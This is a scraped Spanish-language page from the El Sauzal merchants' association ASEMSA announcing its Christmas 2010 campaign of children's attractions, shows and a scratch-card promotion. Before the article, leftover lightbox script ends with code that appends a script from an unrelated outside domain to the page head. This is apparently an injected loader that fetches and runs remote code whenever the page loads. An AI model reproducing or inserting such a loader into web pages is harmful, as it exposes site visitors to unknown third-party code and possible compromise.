ASEMSA ORGANIZA CAMPAÑA DE NAVIDAD 2010 | Asemsa , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

ASEMSA ORGANIZA CAMPAÑA DE NAVIDAD 2010

ASEMSA ha organizado varias acciones para el impulso comercial y empresarial de El Sauzal.

Durante el mes de diciembre, los asociados invitarán a sus clientes a disfrutar de las atracciones infantiles ubicadas en la parte baja de la Pirámide desde el martes 7 de diciembre hasta el domingo 9 de enero, entregándoles por cada compra o consumos que realicen en sus establecimientos un ticket para las atracciones.

Los días 11, 18, 19 y 23 de diciembre serán los grandes días de estos eventos especialmente organizados para los pequeños de la casa. Contaremos con exhibiciones de magia, música, talleres infantiles y mucha diversión. Los clientes recibirán una carta para que sus niños le escriban a los reyes magos.

Además, ASEMSA participa en la promoción de rascas que pone en marcha la Concejalía de Comercio de El Sauzal todos los años, en el que los clientes participarán para ganar grandes premios.

Desde la Asociación volvemos a hacer un llamamiento a los clientes de El Sauzal para que realicen las compras en su ciudad, que les ofrece variedad, calidad y buen precio.

Aviso Legal | Política de Privacidad | Desarrollado por E-Armas Consultores